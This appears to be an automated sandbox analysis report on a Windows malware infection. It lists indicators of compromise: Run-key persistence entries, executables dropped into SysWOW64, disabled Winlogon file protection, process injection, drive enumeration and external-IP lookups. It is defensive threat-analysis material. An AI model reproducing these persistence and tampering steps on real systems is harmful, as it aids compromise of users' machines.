!FIXInj.exebupqjacxngvmelo.exeselfaware.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." !FIXInj.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lyxsukkr = "ndrhuzubnp.exe" bupqjacxngvmelo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ryyocijb = "bupqjacxngvmelo.exe" bupqjacxngvmelo.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "kihaslfgtkziw.exe" bupqjacxngvmelo.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\db12d699-633c-499d-af36-d22645a97118\\selfaware.exe\" --AutoStart" selfaware.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
cmd.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
gjiuvdvi.exendrhuzubnp.exegjiuvdvi.exedescription ioc Process File opened (read-only) \??\b: gjiuvdvi.exe File opened (read-only) \??\j: gjiuvdvi.exe File opened (read-only) \??\m: gjiuvdvi.exe File opened (read-only) \??\x: gjiuvdvi.exe File opened (read-only) \??\z: gjiuvdvi.exe File opened (read-only) \??\i: ndrhuzubnp.exe File opened (read-only) \??\r: gjiuvdvi.exe File opened (read-only) \??\k: gjiuvdvi.exe File opened (read-only) \??\n: gjiuvdvi.exe File opened (read-only) \??\y: gjiuvdvi.exe File opened (read-only) \??\s: gjiuvdvi.exe File opened (read-only) \??\g: ndrhuzubnp.exe File opened (read-only) \??\k: ndrhuzubnp.exe File opened (read-only) \??\o: gjiuvdvi.exe File opened (read-only) \??\v: gjiuvdvi.exe File opened (read-only) \??\y: ndrhuzubnp.exe File opened (read-only) \??\i: gjiuvdvi.exe File opened (read-only) \??\r: gjiuvdvi.exe File opened (read-only) \??\q: ndrhuzubnp.exe File opened (read-only) \??\q: gjiuvdvi.exe File opened (read-only) \??\t: gjiuvdvi.exe File opened (read-only) \??\u: gjiuvdvi.exe File opened (read-only) \??\a: gjiuvdvi.exe File opened (read-only) \??\l: gjiuvdvi.exe File opened (read-only) \??\n: ndrhuzubnp.exe File opened (read-only) \??\t: ndrhuzubnp.exe File opened (read-only) \??\b: gjiuvdvi.exe File opened (read-only) \??\x: gjiuvdvi.exe File opened (read-only) \??\z: gjiuvdvi.exe File opened (read-only) \??\h: gjiuvdvi.exe File opened (read-only) \??\q: gjiuvdvi.exe File opened (read-only) \??\a: ndrhuzubnp.exe File opened (read-only) \??\r: ndrhuzubnp.exe File opened (read-only) \??\t: gjiuvdvi.exe File opened (read-only) \??\l: ndrhuzubnp.exe File opened (read-only) \??\n: gjiuvdvi.exe File opened (read-only) \??\z: ndrhuzubnp.exe File opened (read-only) \??\k: gjiuvdvi.exe File opened (read-only) \??\e: ndrhuzubnp.exe File opened (read-only) \??\x: ndrhuzubnp.exe File opened (read-only) \??\h: gjiuvdvi.exe File opened (read-only) \??\w: gjiuvdvi.exe File opened (read-only) \??\o: ndrhuzubnp.exe File opened (read-only) \??\v: ndrhuzubnp.exe File opened (read-only) \??\m: ndrhuzubnp.exe File opened (read-only) \??\s: ndrhuzubnp.exe File opened (read-only) \??\j: gjiuvdvi.exe File opened (read-only) \??\o: gjiuvdvi.exe File opened (read-only) \??\w: gjiuvdvi.exe File opened (read-only) \??\i: gjiuvdvi.exe File opened (read-only) \??\b: ndrhuzubnp.exe File opened (read-only) \??\p: ndrhuzubnp.exe File opened (read-only) \??\m: gjiuvdvi.exe File opened (read-only) \??\j: ndrhuzubnp.exe File opened (read-only) \??\e: gjiuvdvi.exe File opened (read-only) \??\p: gjiuvdvi.exe File opened (read-only) \??\v: gjiuvdvi.exe File opened (read-only) \??\y: gjiuvdvi.exe File opened (read-only) \??\h: ndrhuzubnp.exe File opened (read-only) \??\g: gjiuvdvi.exe File opened (read-only) \??\a: gjiuvdvi.exe File opened (read-only) \??\e: gjiuvdvi.exe File opened (read-only) \??\g: gjiuvdvi.exe File opened (read-only) \??\w: ndrhuzubnp.exe -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 205 api.2ip.ua 209 api.ipify.org 203 api.2ip.ua 204 api.2ip.ua -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197" ndrhuzubnp.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/files/0x0005000000019444-107.dat autoit_exe behavioral1/files/0x000500000001936c-192.dat autoit_exe behavioral1/files/0x00050000000194ba-202.dat autoit_exe behavioral1/files/0x000400000001da36-6090.dat autoit_exe -
Drops file in System32 directory 9 IoCs
Processes:
jaffa.exendrhuzubnp.exedescription ioc Process File created C:\Windows\SysWOW64\bupqjacxngvmelo.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\bupqjacxngvmelo.exe jaffa.exe File created C:\Windows\SysWOW64\gjiuvdvi.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\gjiuvdvi.exe jaffa.exe File created C:\Windows\SysWOW64\kihaslfgtkziw.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\kihaslfgtkziw.exe jaffa.exe File opened for modification C:\Windows\SysWOW64\msvbvm60.dll ndrhuzubnp.exe File opened for modification C:\Windows\SysWOW64\ndrhuzubnp.exe jaffa.exe File created C:\Windows\SysWOW64\ndrhuzubnp.exe jaffa.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
reg.exeCLWCP.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" CLWCP.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
selfaware.exesjhkhda.exeselfaware.exebuild3.exemstsca.exemstsca.exedescription pid Process procid_target PID 3708 set thread context of 3088 3708 selfaware.exe 273 PID 2412 set thread context of 4052 2412 sjhkhda.exe 275 PID 2592 set thread context of 3748 2592 selfaware.exe 285 PID 3884 set thread context of 3936 3884 build3.exe 289 PID 3976 set thread context of 2220 3976 mstsca.exe 294 PID 2272 set thread context of 3440 2272 mstsca.exe 298 -
Drops file in Program Files directory 38 IoCs
Processes:
gjiuvdvi.exeWinaeroTweaker-1.40.0.0-setup.tmpscary.exegjiuvdvi.exedescription ioc Process File opened for modification \??\c:\Program Files\UnpublishCompress.doc.exe gjiuvdvi.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal gjiuvdvi.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-2PG5L.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-CMMFN.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe gjiuvdvi.exe File created C:\Program Files\Winaero Tweaker\is-CMASM.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files\SubDir\Romilyaa.exe scary.exe File opened for modification C:\Program Files\UnpublishCompress.doc.exe gjiuvdvi.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-VJ72Q.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.nal gjiuvdvi.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal gjiuvdvi.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files\Winaero Tweaker\WinaeroControls.dll WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-H8EH1.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe gjiuvdvi.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files\Winaero Tweaker\unins000.dat WinaeroTweaker-1.40.0.0-setup.tmp File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.nal gjiuvdvi.exe File created C:\Program Files\Winaero Tweaker\is-LHHBM.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-M6OJR.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-63P53.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-F2KHL.tmp WinaeroTweaker-1.40.0.0-setup.tmp File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.exe gjiuvdvi.exe File created \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe gjiuvdvi.exe File opened for modification \??\c:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.exe gjiuvdvi.exe File opened for modification C:\Program Files\Winaero Tweaker\Elevator.exe WinaeroTweaker-1.40.0.0-setup.tmp File created C:\Program Files\Winaero Tweaker\is-RLANO.tmp WinaeroTweaker-1.40.0.0-setup.tmp File created \??\c:\Program Files\UnpublishCompress.doc.exe gjiuvdvi.exe File opened for modification C:\Program Files\UnpublishCompress.nal gjiuvdvi.exe -
Drops file in Windows directory 5 IoCs
Processes:
jaffa.exeWINWORD.EXEdescription ioc Process File opened for modification C:\Windows\mydoc.rtf jaffa.exe File opened for modification C:\Windows\mydoc.rtf WINWORD.EXE File created C:\Windows\~$mydoc.rtf WINWORD.EXE File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE File opened for modification C:\Windows\~$mydoc.rtf WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
CLWCP.exe1.exe3.exetaskkill.exewim.dllSolaraBootstrapper.exenet1.exeIEXPLORE.EXEIEXPLORE.EXEbupqjacxngvmelo.exegjiuvdvi.exexcopy.exexcopy.exemstsca.exeschtasks.exeregedit.exejkka.exeac3.exetakeown.exef3cb220f1aaa32ca310586e5f62dcab1.exendrhuzubnp.exenet.exeIEXPLORE.EXEWScript.exewimloader.dllschtasks.exejaffa.exexcopy.exetimeout.execmd.execmd.exerundll32.exerundll32.exetimeout.exeWScript.execipher.execipher.exegjiuvdvi.execmd.exexcopy.exereg.exePING.EXEPING.EXEWinaeroTweaker-1.40.0.0-setup.execmd.exenotepad.exeIEXPLORE.EXEnet1.exexcopy.exetakeown.exenotepad.exeipconfig.exereg.exexcopy.execmd.exexcopy.exeicacls.execmd.exetaskkill.exeWINWORD.EXEreg.exeIEXPLORE.EXEpacker.exetasklist.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CLWCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wim.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SolaraBootstrapper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bupqjacxngvmelo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gjiuvdvi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jkka.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f3cb220f1aaa32ca310586e5f62dcab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ndrhuzubnp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimloader.dll Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jaffa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gjiuvdvi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WinaeroTweaker-1.40.0.0-setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ipconfig.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language packer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 19 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 2592 PING.EXE 1604 PING.EXE 3768 PING.EXE 3608 PING.EXE 3528 PING.EXE 1884 PING.EXE 3020 PING.EXE 2404 PING.EXE 2760 PING.EXE 3488 PING.EXE 3992 PING.EXE 3980 PING.EXE 468 PING.EXE 1160 PING.EXE 1200 PING.EXE 3020 PING.EXE 2816 PING.EXE 3480 PING.EXE 936 PING.EXE -
NSIS installer 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0005000000019dd0-227.dat nsis_installer_1 behavioral1/files/0x0005000000019dd0-227.dat nsis_installer_2 -
Office loads VBA resources, possible macro or embedded object present
-
Delays execution with timeout.exe 4 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exepid Process 2136 timeout.exe 3104 timeout.exe 3524 timeout.exe 3316 timeout.exe -
Enumerates system info in registry 2 TTPs 13 IoCs
Processes:
xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 1720 ipconfig.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 3708 taskkill.exe 3976 taskkill.exe 3508 taskkill.exe 2316 taskkill.exe 3676 taskkill.exe 3684 taskkill.exe 1628 taskkill.exe -
Processes:
iexplore.exeiexplore.exeIEXPLORE.EXEreg.exeiexplore.exeiexplore.exe3.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "200" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEPropFontName = "Mongolian Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEFixedFontName = "Courier New" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "6" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\8\IEPropFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F2D6AE21-5D6E-11EF-9257-F6C828CC4EA3} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEFixedFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "2752" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created 